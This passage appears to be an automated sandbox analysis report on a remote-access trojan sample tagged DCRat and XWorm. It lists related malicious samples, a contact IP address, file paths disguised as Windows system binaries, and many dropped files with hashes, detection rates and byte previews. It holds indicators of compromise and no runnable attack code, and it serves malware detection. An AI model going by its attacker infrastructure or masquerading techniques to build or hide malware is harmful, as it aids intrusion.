                        Dang_Tap v3.2.exeGet hashmaliciousXWormBrowse
                        • 147.185.221.19
                        LzMokk1scI.exeGet hashmaliciousNjrat, PureLog Stealer, zgRATBrowse
                        • 147.185.221.19
                        fkuWWu4wjg.elfGet hashmaliciousMiraiBrowse
                        • 147.184.134.137
                        Rf.batGet hashmaliciousXWormBrowse
                        • 147.185.221.19
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe2RfhxxWcuH.exeGet hashmaliciousDCRat, XWormBrowse
                          C:\Program Files\Uninstall Information\OfficeClickToRun.exe2RfhxxWcuH.exeGet hashmaliciousDCRat, XWormBrowse
                            C:\Program Files (x86)\jDownloader\config\conhost.exe2RfhxxWcuH.exeGet hashmaliciousDCRat, XWormBrowse
                              C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe2RfhxxWcuH.exeGet hashmaliciousDCRat, XWormBrowse
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (609), with no line terminators
                                Category:dropped
                                Size (bytes):609
                                Entropy (8bit):5.887540865257822
                                Encrypted:false
                                SSDEEP:12:jDRlQyyqk2HyrQec0YwU98gde9ozm99IpLrlvVqe9+dKTRFyFfz6:jjyZ2SLcbw3gC99IL0CPRYFb6
                                MD5:48FC6CE5C86A14437F0AF388B1EA9987
                                SHA1:FD4DD0B5249EB290BC78BC07F3F1D0AC75171F27
                                SHA-256:ECE301B1C38CA08A2E0B73D21B019DA019084E4848524CA562F137B96901D80A
                                SHA-512:E76F02EC356D6367DBF9E26D53EDBEE5201948B3FDA5E35DCC1806E18F4FC5333F66B13D1FB4D21A1E03B6C1E7A171B47C21E4AF0AE23C2F25D8B0BEFF1545D5
                                Malicious:false
                                Preview:VRgYtMFxNcFai2NQOJWW6YVRaTEF5d1wEgQlvpdtnI7KNEjZEiFmBip66O8ZH92tkTWCmmeipmtyaKEWupBWYPuf1TogrDmnPOj4shxbDg6Zz1gvKlpb8fVVi0LS781mAFiMlJnM2jT1SVq9x3VFXKot2NW1WedEoUZtSTJB8djYMdDNKLfEnwOzayTYxv0YFPM756rdtUH4lQhZKIrL9Zb2GjSeAvOMnLS7QFROeBVTpUOKR4OoEoYqxU1WnNc8F4Qa7kIE1dr7EINvVINGhjH8wlJ6N5kQiWNuDyMqvJxl7bmpHGBfAWafwSnWbM052aYr4crg5gVXwgBU8eyH4FQM5r7vK0PjT1shC5uoYejdBDtQRTX6XsBxJMvNe5WFRwD4ydRDtKtZfxL28re1dSLk05Y0KhJcIeMP9ycxBTNM9mRVB2Pxbfl8kcE2Fa3MAQQBk52JPrzJF8lNnCzRSWBn2NogujrlaAMsVPvFAFhtpb3l10ODll4oOnIWQVZp9OsFw21YRuQMyR7aUDp3UoAzFidsHYyoq1ubsyz890w0Usz7psCNqgVVO39OYIQ26lg6hfrgNq3d2JeXsgDYVk8JgZNzylk0j
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Joe Sandbox View:
                                • Filename: 2RfhxxWcuH.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (432), with no line terminators
                                Category:dropped
                                Size (bytes):432
                                Entropy (8bit):5.8750345879664
                                Encrypted:false
                                SSDEEP:12:P1LfkhMOMhXXXHiJCNjiPnnkEiMS9108q:PpLHiJCNEnZRC08q
                                MD5:EEE8F7CFAC83668ECFEB1D5D7C012A11
                                SHA1:FB2AD686F892B62A122CFD11F4F46497E371FB5C
                                SHA-256:8E8C371F77064753FC7ABEAE789F177FA57E86DBF2A828649E3035323005400C
                                SHA-512:44856F911801815A8BCD335022317346B6E3BE4BF8559D3BF2E4BCB55F41DDF4C0C98D24A6CAA67AADED076206C63020B0004A5BA32DD2E3D74B5B7D240670BD
                                Malicious:false
                                Preview:hiCtPj2vT1VpgwzuABTtl7b2lsa0exgxHRStHeoZ0JUZPkzV7feLsizjHKHgICRgViiOeFmgX32bnBmB3F38TUEicsm7WHRy2yDrBk1127yypX6FhGnDISMBdAwvcpKQmDiy75ASOCGWfP3EvhaQdOqklCNByFYNwhMlzHHlGVyGM0fNGr95O4xYX8M5s8eIn3j8DRPnayKHZkXvg94GFd82uyO05L3H1qcSRhKzcVfZup8xkbZsEXCK4qOOCZsO5CQtHEe8yEot7iIEzaPdwKCdnRYkT6wCnRerYPpf6b49sTNWiJZlJOcvAwF0q3p2RlGqEbpjvthUQCvUEBCKhL3YysqmKzyCwBrGMgSHdz0ZrHf7Bvvp1fVGss1VuDZ54eiOUoHht5qrUdqrNtkYDJLRqlYdo6WZa5eNiRmWnO56ynwO
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Joe Sandbox View:
                                • Filename: 2RfhxxWcuH.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Joe Sandbox View:
                                • Filename: 2RfhxxWcuH.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):116
                                Entropy (8bit):5.554890344299369
                                Encrypted:false
                                SSDEEP:3:jqkuXUcD/Xa2RO/WiAlEQlYnulnJvJJImPiBfR:WkqFD/Xa2ROPjQlYuJJvPipR
                                MD5:4539DFE43C214F120D6B7960FA6AF11E
                                SHA1:CFD91E76D776E8D185731887C775534F2A108179
                                SHA-256:DE46EFE21B80750E02D9997E4789C789B38E141EA6FCA449F1DFB7D6CEC45C28
                                SHA-512:EF620666B9BEA2C75D54A6FCF52857FDCDE7D1CC13F79F821736795276712EB02217AF985CB94DA796EB32BAB6752ED6E1E475B28669B970641ED4789D10FC70
                                Malicious:false
                                Preview:jfrJOds2AcFQx2TUG191zqZ2PurlLCDcshYhZNi2v1WZhKxsyv6neFR3Gy4dwGq7YnhPdv42SHF8T9VE79xaGa8nQfalSEGoLZB4miOC1DUW9TjGdzgw
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Joe Sandbox View:
                                • Filename: 2RfhxxWcuH.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):104
                                Entropy (8bit):5.560983050217844
                                Encrypted:false
                                SSDEEP:3:dWCV0m6SCS7PiOJ5bh8icAhhJ7V2STRdbRX33:0mcSPhh/7cST7b5
                                MD5:4B54EED7A1C461983C35F481011AF74D
                                SHA1:9DDBDA570F979F37688DE544E00D4F7412A28915
                                SHA-256:AE38AD37EB2FC1676B6DBCD7910EA54651C413966C8600B7E9083F6BB1C925C6
                                SHA-512:E9AB83E77BE636808E76CF3452085F522126554C45B69A7F2AF47F688776C5D952517DC93CE96BF5FA94D7BCEA40D3E8C72D59FCDD0994AB1447379BD8ABE405
                                Malicious:false
                                Preview:umUR1cR0r5QHboQna0EXR9O7puwRWwqJyPGwGZuz8lgHZXYeMdMsi3yuYWlHp9e4PHTLidhAFPYqdGiSWSE2j7k4bWYtxnJ8Hl2RDM6s
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (820), with no line terminators
                                Category:dropped
                                Size (bytes):820
                                Entropy (8bit):5.905800036154983
                                Encrypted:false
                                SSDEEP:24:IudYd3Kge+6gpyoUe/8LHKvyC91BgnbalbuRcFuY6:Itd3Kgppp/ESG/qw
                                MD5:A8E3D31D7F1DB9EFDE38E414E862F9C7
                                SHA1:97437C74B4D98EB6F9EED27537D604BCE9B76AE6
                                SHA-256:0AD5A19B7D932752BC918D9BCA02B4C3B3793B5106BB90BF57461FD1B3C7D8C2
                                SHA-512:76BC19BB83661082233FA86F292E76DB32488482749775084809D38E0B0258412F4161DB49F3D671C5AD720C852133C85465CF00A12612841FBB78C905AA4307
                                Malicious:false
                                Preview:dIbA784Pe57rjYti1D6zP8jbIw89q4hYP4f6oEdHPGEEOKkHsWNxu0ieiA1L95jkYico2x3xkzkJ3fM8L0QTqtoYVAXoMSHUgdqps6P5daN4QZlDy39JoQ4o3ES2aPkRsQmazgPOlV0PftH6ZTzSS7pQjBvooXeN05MAxLORouiTapIK6VcHZR9ulV0xulkN0mZkgHJOFiohZV042lrS4Xyi6cYbUagCKUcxPinyMOC1nbUPf64J3STdy1nEss3oBlXF3CoU83FpV74eIJ5XgXJ1A89Y4iFeUXzBEPWcRkK9MnI16J6jwgIocfE4CQZZxlV7H3a2wcF5NJoW0IbvmgryPKiiLcZBLvMlSLtCtDwTaMbT1rE4ynwR3gr7U1rUCEub7CEpZZCjtYXDtPrdYfMh84swdwr1VcQWc9VynYfZlNifJoNFKO6h1NdCURLnrKNRHBku4209Ax5uWNnyimrHftfOfTdVN1sbARXHDcKRX7gDRsqHoWEEdFvYfWOkZevIFeuFzfvFbZtiMb7xmWq0xn75f8mrOk23LY7x8lRJl8mDVNMEZa7Cy5Vbgzj03D11h0WydJzBEgOyB4jSwiSxmzEQCgQJBaQiHuge0XkPl68RqgamPREVuDPrwGv73q9oQqrQYFbZ7DLp1xjfFo4uW5xDfysulmW56UBAzKNJzoXr2j08gQ2OvPRU2oukXrxVrQthviq4au5riGL57tNVtHJrCrILZnwI1BAm0TN8k8yBTjvwdzmnebljGBeEaeew8x0gFiFogPvvTIXc5VskBIoZabfyyIhFdBCgtPq4t7HPqzP7
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (609), with no line terminators
                                Category:dropped
                                Size (bytes):609
                                Entropy (8bit):5.875432697415312
                                Encrypted:false
                                SSDEEP:12:TFhjX70Xt56Lr404uxFAP/CJ5GlXMFox4RKyZCVQZu+Tjj:TFhO76o04YP5Gxre4yQQZu+nj
                                MD5:8BB4990BB7711568F5D781F9F7E160F9
                                SHA1:6FE9137A70D9A8D676E53032600990B9ED51A310
                                SHA-256:548069FC2508B3DA8A1CFDCC50B7647F279C0B584144D4C7F380BDE08B3CF4E8
                                SHA-512:3C91D7E3466B1C4DFAF812E07380B62D2E59EBE83BE76359012A8F4987CC92027B72345E845D5E25C2E51A5B5E97E9A1C53999E54B2E16C7E0ADCE4483B498A3
                                Malicious:false
                                Preview:CUIPy0qYtNGGSwqshVbnxXKUtDK4A8hfI6OIiIicBWGgggFU0dDasxyoJxgvpvXvpk8WhiJZw8laRnyM70Eh5HxUHk8umxwQ8U05iswSTnntMXXg9Txzr00ixnO7kZx9MVc6w2nOEwORdDHuMcuS97jIeSI5eys30oh15btHqiv4miFufevHoeAPvUbeusuPEUazfQzvtmlbLog6NXZ9DkPVoSFlAOX8xf0RHQPOo9YB3iDHxeQWSuMdFEKNLOvePnnqxOy7IKVDLNcFO8xf7ApCTXMCFCDaO4wP5XTjqTOIZJR1lF8NbPgO8kXaBv1GG5yRaNK1oNzowgnKFVb9D099XhQUA2h4bIBeU9aY5GiNa2cb7MVqU2CQ6z43601vq4MnfIzF4CE7RvifFzWxh1kjGvifFhbFOxgfpz6zXPvRyE8KQYyHeEOzUngukT9Xl8seOCzP2gZRFSvBwYPqtUlKjrLCSMPDQYqzWe5NjiO7o6tB1f7LETnRXi5g1w7qRVBqm6pSdBHKFofm8JLxOD96vYbxiYWwlhpT5DZ5zosDMcLtCSirlJbNWE5Ne1tEoUjh8Mr4tP7jU5uSNrvQzpLbGb60IMb75
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (385), with no line terminators
                                Category:dropped
                                Size (bytes):385
                                Entropy (8bit):5.804371664903968
                                Encrypted:false
                                SSDEEP:6:ejpmQaVsTMB98P5+Rtjmdy6vAMyIvTAFVkG63Bcy/fKYB+UMHO/DhCNYihwDrejj:EIDVsTyr6bykTAFVSB7/fzg/hwy
                                MD5:D841B65EDD0373C57B68E5B7AEA75ED5
                                SHA1:BAD0157417E37974D2CF7324A95EB158B038B38B
                                SHA-256:C951DF9149E3CB1D94F3BF2FEA73B744202D4FAC4846A5A8EFC8310DC5CE74D5
                                SHA-512:84943824DFEF2B85DCB439F449D6786A3BCF596D5BA466D56C1ADE9F632F2F5A8F466520A50107D2E384123627A2CE9F2E444B3E01C8655D3F161CF3CBA8883A
                                Malicious:false
                                Preview:5ne9XFMNelKCgH5uITnQueFhLOdmINFGoTxHDA51zo9nFonXiYBDIgnai7yJlkFQfDYNTxrHYwaFfbbglGDtMB8HpWiFMwPPjtHCQZDur3oWFh5GfRhfgVEdFQh6Pl4mgLgvUZQLDTCSWlCHbck4OutNon7A2GfG9Cz4BJvFBWbNTvHdNZfwA9XwcTGrcPT7x5TUwIGRqe31Sf33gdwcksF9pDbsCEnvDeZXbwqETOGfGfe6ZNL8d0WF0UotqXOm1HyxGfbtxrJWlj2JjfSz3oSNIThHI7Y59eo9rqz4wbLvrAdQcfKLFZsMzlpw7TlzTNWH53c2pYDbdhgH0RpmxM0kvbJFAC6c0VbdnWUiCRfqWRtRFi6po8CHXwWdtW2nb
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:ASCII text, with very long lines (840), with no line terminators
                                Category:dropped
                                Size (bytes):840
                                Entropy (8bit):5.899287851191481
                                Encrypted:false
                                SSDEEP:24:8bYQ3wAGv76kRbrOWIHa84YbEmXh8CK9+l+MyewJoIwHvcV7FO:a3w/v76ErUHFtbHX8kzlwx/Bs
                                MD5:EC2E060AE0BDF63F6DDE3806AFB2BB8B
                                SHA1:9A813FEDB420B0F0E5DC2B72688320E718D647E6
                                SHA-256:D0685220EB8D5F0BE9A4E032813617F46D01FE4EC9DF1B1820A57AE3B87D0BAC
                                SHA-512:163B550BFD6A94B80DC7EA0E2EF24C6A3E2C812F1239A3CA65160922F6180F69384AE532DBB9F71823D77D9FD5532EB1878B7C2ACAD96DF21262BFCEDDEB4C18
                                Malicious:false
                                Preview:3lX1NiTQdDFdzb5Ij2gdx6fL7lHTKIGKEROFStrHNmCE3uyABcLKSDC6GL4maAGV74ZhNz00KYQL4bSMwGRr661BOR9GyEqNfrG8VQxMlV94x1Cp3s0UsYZADXT50uBFsCpNUU1fSFFk67OWPTNGOWeHRG5772W1U3LuMzVi1VBnSyEGJ6qgh41Vhh5OZ3hatOQDvdKZ8oP3V1ydCzyBMzTZC0Mo4HJ7xk4EiAUpvQh3p7AqtbLkEfO340A5Qff1eRFu7u5BeJP5RatEzg5c5j3RWAJrAZYQvqZX2Qs8gKF5QTleH6FujC54YyY6lNBFu9JkBVMjx76ud8BDYokDToqsve9E2vWSJAKQJAdvug6mGLaawUi6n7vGSbzgWHrBknkdyu4XLzTxrEmkDjRhNapMPD7sL6Ymz4Cdk7lBaKvyn8ZOyPdw0JyK8YOuwMMOar8wCIAF7QGDo0jRnt35dmvpG1fLt1OO8gY59mMpPXykCufHy7HDSQvy6SpKnyVGB2FHcoRAgNqFxLmVVXXwuL5rvj9r7CBbBsjKpYoKpGhFjqAupTyQbjWz6XW2pkDeLPDEmcq7tMGoo0HEjOBnNv9cWtNSBvfFCC3Un5INn1hOcsLFPSTajaQZPks3OY67rBll7xanGx9WOvAnhHCscEglvdFCNO8P4jhaGkIc1qUva4KekEVGVNenf9zdsYZ1yuboOjh79j1vtuL1SkcI224rF35GvpudQc6qdgQBhYHvVt3uy8KH5R860tjUnaLTzYfRyeXwUblduIVVALSwfmh9d90u66XGMx67Om6UkXwepeMrYNTcIYyM0fxynn0YDeQ6MYHY
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................5..6........6.. ... 6...@.. ........................6...........@...................................6.K....`6.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.sdata.../... 6..0....5.............@....rsrc........`6......$6.............@..@.reloc........6......(6.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3549696
                                Entropy (8bit):7.781810498852624
                                Encrypted:false
                                SSDEEP:49152:adwQZHEwTDiztbzw4zcvOCpkA4CKDOh2ukUZLMAD22T7Xp/whX7ZUWR9i:2XZHEwTUzcvtpzh2xKbepZr
                                MD5:7EC6BC11E4B2E409845E3160EC47F5D7
                                SHA1:C1A1A62F844556FD150C7515E124E98BF6D79A02
                                SHA-256:B59342163EA5752E627B1EB236F42A9882F15FDFF96CA77EBA7B20E416F4A4F3
                                SHA-512:6E6D00144C0F73CA595008074B716631D79A73A4770B75ACDC5CCC743C81B1B36B92BCBAA24C5B6EEC5F4D8D01026E33A70D9FFF4A133AF075FE493FEACFDBD3
                                Malicious:true
                                Antivirus:
